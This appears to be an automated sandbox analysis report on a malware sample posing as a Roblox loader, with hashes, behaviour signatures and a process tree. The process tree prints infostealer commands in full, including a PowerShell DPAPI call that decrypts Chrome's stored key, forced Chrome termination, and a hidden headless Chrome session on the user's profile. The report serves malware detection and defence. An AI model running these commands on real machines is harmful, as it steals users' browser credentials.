Analysis
-
max time kernel
63s -
max time network
68s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27-10-2024 16:44
Static task
static1
Behavioral task
behavioral1
Sample
RobloxLoader.exe
Resource
win7-20241010-en
General
-
Target
RobloxLoader.exe
-
Size
36.9MB
-
MD5
c1f06056c5480224c8f4139028ca5f8e
-
SHA1
aa32bc3480ce763e720d47c2a47907df47f930b0
-
SHA256
4d9b1a73f95cc6a00e7f2cd032c4f877fc15bf66d4f6ec9b61b18e37e791750f
-
SHA512
f8289ebd899772487dc3a3cddd1d69ca8bbc30526c946b8a1fe910cfcfb18335847008b521c228d0dd522d619e65c43cbf4a87cf81492f96550511a13edef10b
-
SSDEEP
393216:qQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgl96l+ZArYsFRlPy9:q3on1HvSzxAMNlFZArYsX1Ys3WL/
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation RobloxLoader.exe -
Loads dropped DLL 2 IoCs
pid Process 2160 RobloxLoader.exe 2160 RobloxLoader.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 3584 cmd.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log chrome.exe -
Kills process with taskkill 2 IoCs
pid Process 1988 taskkill.exe 1384 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5088 powershell.exe 5088 powershell.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe 2160 RobloxLoader.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1816 WMIC.exe Token: SeSecurityPrivilege 1816 WMIC.exe Token: SeTakeOwnershipPrivilege 1816 WMIC.exe Token: SeLoadDriverPrivilege 1816 WMIC.exe Token: SeSystemProfilePrivilege 1816 WMIC.exe Token: SeSystemtimePrivilege 1816 WMIC.exe Token: SeProfSingleProcessPrivilege 1816 WMIC.exe Token: SeIncBasePriorityPrivilege 1816 WMIC.exe Token: SeCreatePagefilePrivilege 1816 WMIC.exe Token: SeBackupPrivilege 1816 WMIC.exe Token: SeRestorePrivilege 1816 WMIC.exe Token: SeShutdownPrivilege 1816 WMIC.exe Token: SeDebugPrivilege 1816 WMIC.exe Token: SeSystemEnvironmentPrivilege 1816 WMIC.exe Token: SeRemoteShutdownPrivilege 1816 WMIC.exe Token: SeUndockPrivilege 1816 WMIC.exe Token: SeManageVolumePrivilege 1816 WMIC.exe Token: 33 1816 WMIC.exe Token: 34 1816 WMIC.exe Token: 35 1816 WMIC.exe Token: 36 1816 WMIC.exe Token: SeIncreaseQuotaPrivilege 1816 WMIC.exe Token: SeSecurityPrivilege 1816 WMIC.exe Token: SeTakeOwnershipPrivilege 1816 WMIC.exe Token: SeLoadDriverPrivilege 1816 WMIC.exe Token: SeSystemProfilePrivilege 1816 WMIC.exe Token: SeSystemtimePrivilege 1816 WMIC.exe Token: SeProfSingleProcessPrivilege 1816 WMIC.exe Token: SeIncBasePriorityPrivilege 1816 WMIC.exe Token: SeCreatePagefilePrivilege 1816 WMIC.exe Token: SeBackupPrivilege 1816 WMIC.exe Token: SeRestorePrivilege 1816 WMIC.exe Token: SeShutdownPrivilege 1816 WMIC.exe Token: SeDebugPrivilege 1816 WMIC.exe Token: SeSystemEnvironmentPrivilege 1816 WMIC.exe Token: SeRemoteShutdownPrivilege 1816 WMIC.exe Token: SeUndockPrivilege 1816 WMIC.exe Token: SeManageVolumePrivilege 1816 WMIC.exe Token: 33 1816 WMIC.exe Token: 34 1816 WMIC.exe Token: 35 1816 WMIC.exe Token: 36 1816 WMIC.exe Token: SeDebugPrivilege 1988 taskkill.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeDebugPrivilege 1384 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2160 wrote to memory of 1848 2160 RobloxLoader.exe 86 PID 2160 wrote to memory of 1848 2160 RobloxLoader.exe 86 PID 1848 wrote to memory of 1816 1848 cmd.exe 88 PID 1848 wrote to memory of 1816 1848 cmd.exe 88 PID 2160 wrote to memory of 664 2160 RobloxLoader.exe 91 PID 2160 wrote to memory of 664 2160 RobloxLoader.exe 91 PID 664 wrote to memory of 1988 664 cmd.exe 93 PID 664 wrote to memory of 1988 664 cmd.exe 93 PID 2160 wrote to memory of 3584 2160 RobloxLoader.exe 94 PID 2160 wrote to memory of 3584 2160 RobloxLoader.exe 94 PID 3584 wrote to memory of 5088 3584 cmd.exe 96 PID 3584 wrote to memory of 5088 3584 cmd.exe 96 PID 2160 wrote to memory of 3184 2160 RobloxLoader.exe 99 PID 2160 wrote to memory of 3184 2160 RobloxLoader.exe 99 PID 3184 wrote to memory of 1384 3184 cmd.exe 101 PID 3184 wrote to memory of 1384 3184 cmd.exe 101 PID 2160 wrote to memory of 4600 2160 RobloxLoader.exe 102 PID 2160 wrote to memory of 4600 2160 RobloxLoader.exe 102 PID 4600 wrote to memory of 2820 4600 chrome.exe 103 PID 4600 wrote to memory of 2820 4600 chrome.exe 103 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 1052 4600 chrome.exe 104 PID 4600 wrote to memory of 4236 4600 chrome.exe 106 PID 4600 wrote to memory of 4236 4600 chrome.exe 106 PID 4600 wrote to memory of 1532 4600 chrome.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\RobloxLoader.exe"C:\Users\Admin\AppData\Local\Temp\RobloxLoader.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get name"2⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get name3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:664 -
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,2,142,118,8,95,31,118,64,160,100,56,129,213,73,187,252,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,113,106,0,247,215,176,4,214,100,69,24,12,82,184,99,251,48,99,62,224,63,15,20,29,91,157,107,67,169,249,96,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,121,179,237,157,205,101,66,46,197,237,84,78,146,147,24,228,86,99,11,181,9,197,187,81,221,135,249,220,177,151,54,48,0,0,0,201,32,108,188,0,214,238,125,56,14,128,232,126,3,179,153,60,210,117,251,33,154,83,61,107,79,102,158,116,82,197,193,171,143,252,200,195,47,26,56,146,47,159,112,126,10,213,222,64,0,0,0,126,107,51,243,210,113,53,220,214,140,169,196,68,149,197,199,57,133,144,71,163,241,191,42,246,87,185,8,107,45,47,241,156,235,130,58,10,186,143,102,250,211,197,126,173,68,108,167,40,14,195,38,121,76,232,215,128,91,229,33,134,94,213,207), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,2,142,118,8,95,31,118,64,160,100,56,129,213,73,187,252,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,113,106,0,247,215,176,4,214,100,69,24,12,82,184,99,251,48,99,62,224,63,15,20,29,91,157,107,67,169,249,96,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,121,179,237,157,205,101,66,46,197,237,84,78,146,147,24,228,86,99,11,181,9,197,187,81,221,135,249,220,177,151,54,48,0,0,0,201,32,108,188,0,214,238,125,56,14,128,232,126,3,179,153,60,210,117,251,33,154,83,61,107,79,102,158,116,82,197,193,171,143,252,200,195,47,26,56,146,47,159,112,126,10,213,222,64,0,0,0,126,107,51,243,210,113,53,220,214,140,169,196,68,149,197,199,57,133,144,71,163,241,191,42,246,87,185,8,107,45,47,241,156,235,130,58,10,186,143,102,250,211,197,126,173,68,108,167,40,14,195,38,121,76,232,215,128,91,229,33,134,94,213,207), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --window-position=-10000,-100002⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97478cc40,0x7ff97478cc4c,0x7ff97478cc583⤵PID:2820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1436,i,10202923576128820199,12732699221550718157,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1428 /prefetch:23⤵PID:1052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1752,i,10202923576128820199,12732699221550718157,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1748 /prefetch:33⤵PID:4236
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=1788,i,10202923576128820199,12732699221550718157,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1780 /prefetch:13⤵
- Drops file in Program Files directory
PID:1532
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
Filesize1.8MB
MD566a65322c9d362a23cf3d3f7735d5430
SHA1ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA5120a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21
-
Filesize
274KB
MD57cbb230781b09f0543c935ce1d17dad0
SHA184d30df3dd76a7bd50ce54ae461277002abd619e
SHA25690d39ca6189c82070a36a8f7784fb44578d05ba4c043ba42d254b76bcfe47a4d
SHA51214a9964bbde4e2c05077bfabb518a99e6108fb3dc4acc69905fbfa2f295b119edfdd3f758d8913fd1faac96c18c90e6b97cc14568e931d0732e8b1a24e5d5fdf